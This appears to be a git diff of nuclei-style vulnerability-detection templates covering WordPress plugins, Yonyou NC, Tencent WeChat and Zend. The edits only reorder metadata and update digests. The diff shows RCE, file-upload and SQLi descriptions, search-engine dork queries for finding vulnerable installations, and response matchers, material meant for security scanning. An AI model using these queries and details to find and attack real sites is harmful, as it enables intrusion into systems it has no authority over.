+8,16 @@ info: There is an information leakage vulnerability in the agentinfo interface of Tencent Enterprise WeChat. An attacker can obtain the Enterprise WeChat Secret through the vulnerability. reference: - https://github.com/Threekiii/Awesome-POC/blob/f7869eb69bad66d177a88df4cebfe584691651ce/%E5%85%B6%E4%BB%96%E6%BC%8F%E6%B4%9E/%E8%85%BE%E8%AE%AF%20%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%20agentinfo%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md + classification: + cpe: cpe:2.3:a:tencent:wechat:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: body="wework_admin.normal_layout" - product: wechat vendor: tencent + product: wechat + fofa-query: body="wework_admin.normal_layout" tags: wechat,exposure,tencent - classification: - cpe: cpe:2.3:a:tencent:wechat:*:*:*:*:*:*:*:* http: - raw: - | @@ -32,4 +32,4 @@ http: - contains(body_1,"corpid") condition: and -# digest: 490a0046304402207f486e40109265aad0c4dbad59a5f8796ffbe6ce2d5707c954f4fe749f5f20fa0220570d64485600b1b15c5fd02eadd4efe5a190588c346ac31ee8f25047e7b55b7f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207f486e40109265aad0c4dbad59a5f8796ffbe6ce2d5707c954f4fe749f5f20fa0220570d64485600b1b15c5fd02eadd4efe5a190588c346ac31ee8f25047e7b55b7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/booked-export-csv.yaml b/http/vulnerabilities/wordpress/booked-export-csv.yaml index 9971d2242a..a04ca8f8eb 100644 --- a/http/vulnerabilities/wordpress/booked-export-csv.yaml +++ b/http/vulnerabilities/wordpress/booked-export-csv.yaml @@ -11,18 +11,18 @@ info: - https://codecanyon.net/item/booked-appointments-appointment-booking-for-wordpress/9466968 - http://boxyupdates.com/changelog.php?p=booked - https://wpscan.com/vulnerability/10107 + classification: + cpe: cpe:2.3:a:twinkletoessoftware:booked:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: twinkletoessoftware + product: booked fofa-query: "wp-content/plugins/booked/" publicwww-query: "/wp-content/plugins/booked/" google-query: inurl:"/wp-content/plugins/booked/" - product: booked - vendor: twinkletoessoftware tags: wordpress,wpscan,wp-plugin,wp,booked,bypass - classification: - cpe: cpe:2.3:a:twinkletoessoftware:booked:*:*:*:*:*:*:*:* http: - raw: - | @@ -51,4 +51,4 @@ http: status: - 200 -# digest: 490a0046304402200db5cb115b1bff83639450515ea6bf1a039f02fba337ac6d20ba4c2e9a0795f602200d97f3b9ea9d40eeec6b70cdc4d8f68747265ebc83fbc650f251b1ee75bb5e0f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200db5cb115b1bff83639450515ea6bf1a039f02fba337ac6d20ba4c2e9a0795f602200d97f3b9ea9d40eeec6b70cdc4d8f68747265ebc83fbc650f251b1ee75bb5e0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/photo-gallery-xss.yaml b/http/vulnerabilities/wordpress/photo-gallery-xss.yaml index 0ed18d7f49..583ee9c8dd 100644 --- a/http/vulnerabilities/wordpress/photo-gallery-xss.yaml +++ b/http/vulnerabilities/wordpress/photo-gallery-xss.yaml @@ -10,16 +10,16 @@ info: reference: - https://wpscan.com/vulnerability/e9f9bfb0-7cb8-4f92-b436-f08442a6c60a - https://wordpress.org/plugins/photo-gallery/advanced/ + classification: + cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 2 - publicwww-query: "/wp-content/plugins/photo-gallery" - product: photo_gallery vendor: 10web + product: photo_gallery + publicwww-query: "/wp-content/plugins/photo-gallery" tags: wpscan,wp,wp-plugin,wordpress,xss,photo-gallery,authenticated - classification: - cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:wordpress:*:*:* http: - raw: - | @@ -49,4 +49,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed838d1eb6e31bb67b91342275beb740717183a647ca0a4de4ba234b04d4e99402201d07b07900c542788eb8c84bc3c667c8c50239ae69e7c8e8fb4b80dfe8dd0732:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100ed838d1eb6e31bb67b91342275beb740717183a647ca0a4de4ba234b04d4e99402201d07b07900c542788eb8c84bc3c667c8c50239ae69e7c8e8fb4b80dfe8dd0732:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml b/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml index 6b5469fa8f..7956f9d37d 100644 --- a/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml +++ b/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xss.yaml @@ -11,16 +11,16 @@ info: - https://plugins.trac.wordpress.org/changeset/2117972 - https://wpscan.com/vulnerability/5c57e78a-97b9-4e23-8935-e4c9d806c89d - https://wordpress.org/plugins/photoblocks-grid-gallery/ + classification: + cpe: cpe:2.3:a:wpchill:gallery_photoblocks:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 - publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" - product: gallery_photoblocks vendor: wpchill + product: gallery_photoblocks + publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/" tags: wordpress,wpscan,photoblocks,wp-plugin,wp,xss - classification: - cpe: cpe:2.3:a:wpchill:gallery_photoblocks:*:*:*:*:wordpress:*:*:* http: - raw: - | @@ -36,4 +36,4 @@ http: - 'contains(body, "PhotoBlocks")' condition: and -# digest: 4a0a00473045022100e25d0c3f2b8523d249ea8a1fcf6aa3cb5352dde3741a6d1d98af45fbc385795002206e778ddccd1913d8f33ffe208083c9d0913d0952757b3d3e7f3a52afd8e89deb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e25d0c3f2b8523d249ea8a1fcf6aa3cb5352dde3741a6d1d98af45fbc385795002206e778ddccd1913d8f33ffe208083c9d0913d0952757b3d3e7f3a52afd8e89deb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml index c85cd27a5a..dc35321628 100644 --- a/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml +++ b/http/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml @@ -8,15 +8,15 @@ info: reference: - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress - https://github.com/incogbyte/quickpress/blob/master/core/req.go - metadata: - max-request: 2 - fofa-query: body="oembed" && body="wp-" - product: wordpress - vendor: wordpress - tags: wordpress,ssrf,oast,oembed - classification: cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: wordpress + product: wordpress + fofa-query: body="oembed" && body="wp-" + tags: wordpress,ssrf,oast,oembed + http: - raw: - | @@ -37,4 +37,5 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100d01d8cb29dc06ed371272fb5eb94b0e4d93d1d9392e7d76a9aa9691b160c9f8302206e208f25527d7b4a7bb0578fff2e7d0ff119185620872124d38e02fe3d21c96a:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100d01d8cb29dc06ed371272fb5eb94b0e4d93d1d9392e7d76a9aa9691b160c9f8302206e208f25527d7b4a7bb0578fff2e7d0ff119185620872124d38e02fe3d21c96a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml b/http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml index 18eccfad20..e57e6b43ab 100644 --- a/http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml +++ b/http/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml @@ -5,15 +5,15 @@ info: author: pussycat0x severity: low description: Searches for sensitive directories present in the mstore-api plugin. - metadata: - max-request: 1 - google-query: inurl:/wp-content/plugins/mstore-api/ - product: mstore_api - vendor: inspireui - tags: wordpress,listing,wp-plugin - classification: cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:wordpress:*:*:* + metadata: + max-request: 1 + vendor: inspireui + product: mstore_api + google-query: inurl:/wp-content/plugins/mstore-api/ + tags: wordpress,listing,wp-plugin + http: - method: GET path: @@ -31,4 +31,4 @@ http: status: - 200 -# digest: 490a0046304402201c167b12dde8a2e224c39074bad196d4138ac6424b66c782950a121b035427e9022014040370921dffe68731e76f661227a0c9515014014b0b4c9930fac8726fa0b3:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201c167b12dde8a2e224c39074bad196d4138ac6424b66c782950a121b035427e9022014040370921dffe68731e76f661227a0c9515014014b0b4c9930fac8726fa0b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml b/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml index d7f3288bc3..33b88e9bfc 100644 --- a/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml +++ b/http/vulnerabilities/wordpress/wp-social-warfare-rce.yaml @@ -10,16 +10,16 @@ info: reference: - https://wpscan.com/vulnerability/9259 - https://wordpress.org/plugins/social-warfare/ + classification: + cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 - publicwww-query: "/wp-content/plugins/social-warfare/" - product: social_warfare vendor: warfareplugins + product: social_warfare + publicwww-query: "/wp-content/plugins/social-warfare/" tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce - classification: - cpe: cpe:2.3:a:warfareplugins:social_warfare:*:*:*:*:wordpress:*:*:* http: - raw: - | @@ -45,4 +45,4 @@ http: status: - 500 -# digest: 4b0a00483046022100b422b9d2f6f7cb6f3086df500121ac639b2f4fc54cbc83b2ba41e8a26b0d4805022100e530bfee70cc44ac1a0c3e2097cecf0b1442c2f2093c923018d14de1c5d47353:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b422b9d2f6f7cb6f3086df500121ac639b2f4fc54cbc83b2ba41e8a26b0d4805022100e530bfee70cc44ac1a0c3e2097cecf0b1442c2f2093c923018d14de1c5d47353:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml index 52adab9487..994e42e87d 100644 --- a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml +++ b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml @@ -11,16 +11,15 @@ info: - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wp-statistics-sql-injection-13-0-7/ - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ - https://wordpress.org/plugins/wp-statistics/ + classification: + cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 2 - publicwww-query: /wp-content/plugins/wp-statistics/ - product: wp_statistics vendor: veronalabs + product: wp_statistics + publicwww-query: /wp-content/plugins/wp-statistics/ tags: sqli,unauth,exploitdb,wp-statistics,wp-plugin,wordpress,wp - - classification: - cpe: cpe:2.3:a:veronalabs:wp_statistics:*:*:*:*:wordpress:*:*:* flow: http(1) && http(2) http: @@ -47,4 +46,5 @@ http: - 'duration>=7' - 'status_code == 500' condition: and -# digest: 4b0a00483046022100abaa28e651b210b16c0910cfc40de1dc65e41bdbf4150e144034996b9e6f6d67022100c71a5be312c71de5824d7fde059005c193b18d031d8c1d42c9459cbc4f1762bc:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100abaa28e651b210b16c0910cfc40de1dc65e41bdbf4150e144034996b9e6f6d67022100c71a5be312c71de5824d7fde059005c193b18d031d8c1d42c9459cbc4f1762bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml b/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml index 5140a12ab9..dfe09c7afb 100644 --- a/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml +++ b/http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml @@ -9,17 +9,17 @@ info: reference: - https://cxsecurity.com/issue/WLB-2021010145 - https://www.exploitalert.com/view-details.html?id=36983 + classification: + cpe: cpe:2.3:a:superstorefinder:super_store_finder:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 + vendor: superstorefinder + product: super_store_finder publicwww-query: /wp-content/plugins/superstorefinder-wp/ google-query: inurl:"wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php" - product: super_store_finder - vendor: superstorefinder tags: wordpress,wp-plugin,superstorefinder-wp,wp,misconfig - classification: - cpe: cpe:2.3:a:superstorefinder:super_store_finder:*:*:*:*:wordpress:*:*:* http: - raw: - | @@ -34,4 +34,4 @@ http: - 'contains(content_type, "text/html")' condition: and -# digest: 490a0046304402205624314a7fa843184b0006a4166011527395e568b8ad05b057c6736e989da9ba02200811b24c1e44539543fbb7c61236aa51bea06d2e84315390ed2377fb5f156f91:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205624314a7fa843184b0006a4166011527395e568b8ad05b057c6736e989da9ba02200811b24c1e44539543fbb7c61236aa51bea06d2e84315390ed2377fb5f156f91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/wp-sym404.yaml b/http/vulnerabilities/wordpress/wp-sym404.yaml index 0d3db3de75..7234690f62 100644 --- a/http/vulnerabilities/wordpress/wp-sym404.yaml +++ b/http/vulnerabilities/wordpress/wp-sym404.yaml @@ -7,16 +7,16 @@ info: description: Searches for sensitive directories present in the sym404. reference: - https://twitter.com/momika233/status/1540325055280070656 + classification: + cpe: cpe:2.3:a:wpvnteam:wp_extra:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 - google-query: inurl:"/wp-includes/sym404/" - product: wp_extra vendor: wpvnteam + product: wp_extra + google-query: inurl:"/wp-includes/sym404/" tags: wordpress,listing,wp,exposure - classification: - cpe: cpe:2.3:a:wpvnteam:wp_extra:*:*:*:*:wordpress:*:*:* http: - method: GET path: @@ -33,4 +33,4 @@ http: status: - 200 -# digest: 4a0a0047304502205dd3cf13cb2c1cbe9e8c9ee5b5ec1cadba1c5cdc6e7da781e9b6316ebbffb061022100a57c3751a86bfebb593c932bdc096bb4fffe403802494bc0fc9bd5cf6cc9fc23:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205dd3cf13cb2c1cbe9e8c9ee5b5ec1cadba1c5cdc6e7da781e9b6316ebbffb061022100a57c3751a86bfebb593c932bdc096bb4fffe403802494bc0fc9bd5cf6cc9fc23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/wp-touch-redirect.yaml b/http/vulnerabilities/wordpress/wp-touch-redirect.yaml index f529d79221..9ab0e3a35d 100644 --- a/http/vulnerabilities/wordpress/wp-touch-redirect.yaml +++ b/http/vulnerabilities/wordpress/wp-touch-redirect.yaml @@ -8,16 +8,16 @@ info: WordPress WPtouch 3.7.5 is affected by an Open Redirect issue. reference: - https://packetstormsecurity.com/files/170568/WordPress-WPtouch-3.7.5-Open-Redirection.html + classification: + cpe: cpe:2.3:a:bravenewcode:wptouch:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - google-query: "inurl:/wp-content/plugins/wptouch" - product: wptouch vendor: bravenewcode + product: wptouch + google-query: "inurl:/wp-content/plugins/wptouch" tags: wp-plugin,wp,packetstorm,wptouch,unauth,redirect,wordpress - classification: - cpe: cpe:2.3:a:bravenewcode:wptouch:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a00483046022100c1a18b23c8641748ee0c0fffb8d266468022842969790931b9728610b11d76b8022100ceedc9dd4ef1e7c9324c404766e21c13f2b7b1ae717e93bd62626bf8a4423990:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c1a18b23c8641748ee0c0fffb8d266468022842969790931b9728610b11d76b8022100ceedc9dd4ef1e7c9324c404766e21c13f2b7b1ae717e93bd62626bf8a4423990:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml b/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml index 64e3ff5995..38531c76e9 100644 --- a/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml +++ b/http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml @@ -6,16 +6,16 @@ info: severity: info reference: - https://developer.yoast.com/features/xml-sitemaps/functional-specification/ + classification: + cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 - google-query: inurl:"/author-sitemap.xml" - product: yoast_seo vendor: yoast + product: yoast_seo + google-query: inurl:"/author-sitemap.xml" tags: wp,wp-plugin,wordpress,username,disclosure - classification: - cpe: cpe:2.3:a:yoast:yoast_seo:*:*:*:*:wordpress:*:*:* http: - raw: - | @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022047ff660cb9bf3356e8492c2525614a375bb960108ec4935be7d35cde6224149202203d96ace3f2c72c5618a2af1c6138367709ce3adfd90f34ab3eda2f35d82ff160:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022047ff660cb9bf3356e8492c2525614a375bb960108ec4935be7d35cde6224149202203d96ace3f2c72c5618a2af1c6138367709ce3adfd90f34ab3eda2f35d82ff160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml index efb620b81d..57a4f1ab92 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml @@ -9,16 +9,16 @@ info: reference: - http://wiki.peiqi.tech/wiki/oa/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20GRP-U8%20Proxy%20SQL%E6%B3%A8%E5%85%A5%20CNNVD-201610-923.html - https://mp.weixin.qq.com/s?__biz=MzkyMTMwNjU1Mg==&chksm=c184c6a1f6f34fb788437557f0e7708c74b16928e5973772db09b12067f10cf28b108701f67a&idx=1&lang=zh_CN&mid=2247488118&sn=16217c422eafc656df5fcacee9aa2153&token=857848930#rd + classification: + cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - fofa-query: icon_hash="1085941792" - product: ufida-nc vendor: yonyou + product: ufida-nc + fofa-query: icon_hash="1085941792" tags: yonyou,nc,intrusive,fileupload - classification: - cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* http: - raw: - | @@ -51,4 +51,4 @@ http: - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" condition: and -# digest: 490a004630440220518a3baba6f10679a1b190066ccde7721347a5e9e36904c65a310b4befa16f540220205f5d9c798bc4541567cf6711292cda00347b9e7c916d888fdff343e6cec6da:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220518a3baba6f10679a1b190066ccde7721347a5e9e36904c65a310b4befa16f540220205f5d9c798bc4541567cf6711292cda00347b9e7c916d888fdff343e6cec6da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml index 0b8c7e5912..8a050dcc01 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml @@ -8,16 +8,16 @@ info: Yonyou NC is an enterprise-level management software, widely used in large and medium-sized enterprises.Realize modeling, development, inheritance, operation, management integration of IT solution information platform.UFIDA NC for C/S architecture, the use of Java programming language development, the client can directly use UClient, the server interface for HTTP.A page of UFIDA NC6.5, there is arbitrary file upload vulnerability.The cause of vulnerability is that there is no type restriction at the uploading file, and an attacker without authentication can take advantage of this vulnerability by sending special data packets to the target system, and a remote attacker who successfully takes advantage of this vulnerability can upload any file to the target system to execute commands. reference: - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Yonyou-NC-BaseApp-UploadServlet-Deserialization-RCE.json + classification: + cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="Yonyou-UFIDA-NC" - product: ufida-nc vendor: yonyou + product: ufida-nc + fofa-query: app="Yonyou-UFIDA-NC" tags: yonyou,nc,fileupload,baseapp,deserialization,intrusive - classification: - cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,4 @@ http: - 'status_code_1 == 200 && contains_all(body_1,"java.io","EOFExceptionYI")' condition: and -# digest: 4a0a0047304502206bf0c638958001afad3ac481fa22472c2f2a4f1a14a75ea3d81d5e14a018b923022100cccf2c9cacc806de75ec4b150aaea3aa365c3d9eb9e8dec19bab6684d16c5e19:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206bf0c638958001afad3ac481fa22472c2f2a4f1a14a75ea3d81d5e14a018b923022100cccf2c9cacc806de75ec4b150aaea3aa365c3d9eb9e8dec19bab6684d16c5e19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml index 15d56ecf47..a99f287635 100755 --- a/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml @@ -8,16 +8,16 @@ info: Yonyou NC ServiceDispatcherServlet deserialization file upload vulnerability. reference: - https://github.com/lal0ne/vulnerability/blob/c0985107adfd91d85fbd76d9a8acf8fbfa98ed41/YonyouNC/ncDecode/README.md + classification: + cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - fofa-query: icon_hash="1085941792" - product: ufida-nc vendor: yonyou + product: ufida-nc + fofa-query: icon_hash="1085941792" tags: yonyou,intrusive,fileupload - classification: - cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* http: - raw: - | @@ -39,4 +39,4 @@ http: - "status_code_2 == 200 && contains(body_2,'just_a_test')" condition: and -# digest: 4b0a00483046022100b133fa848f0dfa29959a4593e87849235eec2ba638a6b83ab7726c39748bb592022100b4ef8f4f815d5b12f118f5770b9b7dee0d102fa7942007358ba698c3ac5d932d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b133fa848f0dfa29959a4593e87849235eec2ba638a6b83ab7726c39748bb592022100b4ef8f4f815d5b12f118f5770b9b7dee0d102fa7942007358ba698c3ac5d932d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml b/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml index 9e983bce04..faced8c006 100644 --- a/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml @@ -9,16 +9,16 @@ info: reference: - https://mp.weixin.qq.com/s/Lu6Zd9LP3PQsb8uzTIcANQ - https://github.com/zhangzhenfeng/AnyScan/blob/master/AnyScanUI/AnyPoc/data/poc/bugscan/exp%EF%BC%8D2311.py + classification: + cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="用友-UFIDA-NC - product: ufida-nc vendor: yonyou + product: ufida-nc + fofa-query: app="用友-UFIDA-NC tags: yonyou,nc,exposure - classification: - cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,4 @@ http: status: - 200 -# digest: 4b0a00483046022100ba808960df0e03550d2e5eda2a333ad6a26eaa3bd173d2b3ba85aec8f68d5324022100e76f70ee0cefdda44f1a51fa6b25e5a3c00881bc6ccadb6b7bc1f58af1c68889:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ba808960df0e03550d2e5eda2a333ad6a26eaa3bd173d2b3ba85aec8f68d5324022100e76f70ee0cefdda44f1a51fa6b25e5a3c00881bc6ccadb6b7bc1f58af1c68889:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml index 904639a33b..619a16be1b 100644 --- a/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml +++ b/http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml @@ -8,16 +8,16 @@ info: UFIDA NC is in the process of processing client request data. Insufficient checking and filtering when deserializing user-supplied data can lead to malicious deserialization operations and execution of commands on the operating system. After analysis, security researchers found that the system has many exploit points for deserialization. Currently, the official vulnerability fix plan is to perform deserialization whitelist control on known exploit points and repair some exploit chain dependencies. The possibility of similar problems occurring in the system in the future is still high. reference: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/yonyou-nc-ncmessageservlet-rce.yaml + classification: + cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - fofa-query: app="用友-UFIDA-NC - product: ufida-nc vendor: yonyou + product: ufida-nc + fofa-query: app="用友-UFIDA-NC tags: yonyou,rce,deserialization - classification: - cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* http: - raw: - | @@ -46,4 +46,4 @@ http: - 'status_code_2 == 200 && contains(header_2,"X-T0ken") && contains(header_2,"MTc5Njc2NTUwNQ==")' condition: or -# digest: 490a00463044022030de43a15056ab8c85ca3db1438ad602e9f55af19ce951b485c8b1a1400336ac02204d9b2f9df87c66b8851194b0008a4d307d7d5ca3c818274d9f75c69398651fc8:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022030de43a15056ab8c85ca3db1438ad602e9f55af19ce951b485c8b1a1400336ac02204d9b2f9df87c66b8851194b0008a4d307d7d5ca3c818274d9f75c69398651fc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml b/http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml index bae34577e0..bf5c786844 100644 --- a/http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml +++ b/http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml @@ -8,16 +8,16 @@ info: There is any file reading in the getFileLocal interface of UFIDA Mobile System Management. reference: - https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8B%E7%A7%BB%E5%8A%A8%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86getFileLocal%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.md + classification: + cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="用友-移动系统管理" - product: ufida-nc vendor: yonyou + product: ufida-nc + fofa-query: app="用友-移动系统管理" tags: yonyou,ufida,lfi - classification: - cpe: cpe:2.3:a:yonyou:ufida-nc:*:*:*:*:*:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c3a2a882cbb2f8cc83f6a51534bca511ca636c21a6a1b9a3c9ea856d3decadb9022100e0b7a63f900e860e664e03c6f3a43dfceaecd5ab4c7b7aeb5b920d9dc27369ef:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100c3a2a882cbb2f8cc83f6a51534bca511ca636c21a6a1b9a3c9ea856d3decadb9022100e0b7a63f900e860e664e03c6f3a43dfceaecd5ab4c7b7aeb5b920d9dc27369ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/zend/zend-v1-xss.yaml b/http/vulnerabilities/zend/zend-v1-xss.yaml index dfaa454200..d85804d1ca 100644 --- a/http/vulnerabilities/zend/zend-v1-xss.yaml +++ b/http/vulnerabilities/zend/zend-v1-xss.yaml @@ -8,16 +8,16 @@ info: ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter. reference: - https://twitter.com/c3l3si4n/status/1600035722148212737 + classification: + cpe: cpe:2.3:a:zend:zend_framework:1.12.2:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - google-query: inurl:"/tests/Zend/Http/" - product: zend_framework vendor: zend + product: zend_framework + google-query: inurl:"/tests/Zend/Http/" tags: zend,zendframework,xss - classification: - cpe: cpe:2.3:a:zend:zend_framework:1.12.2:*:*:*:*:*:*:* http: - method: GET path: @@ -45,4 +45,4 @@ http: status: - 200 -# digest: 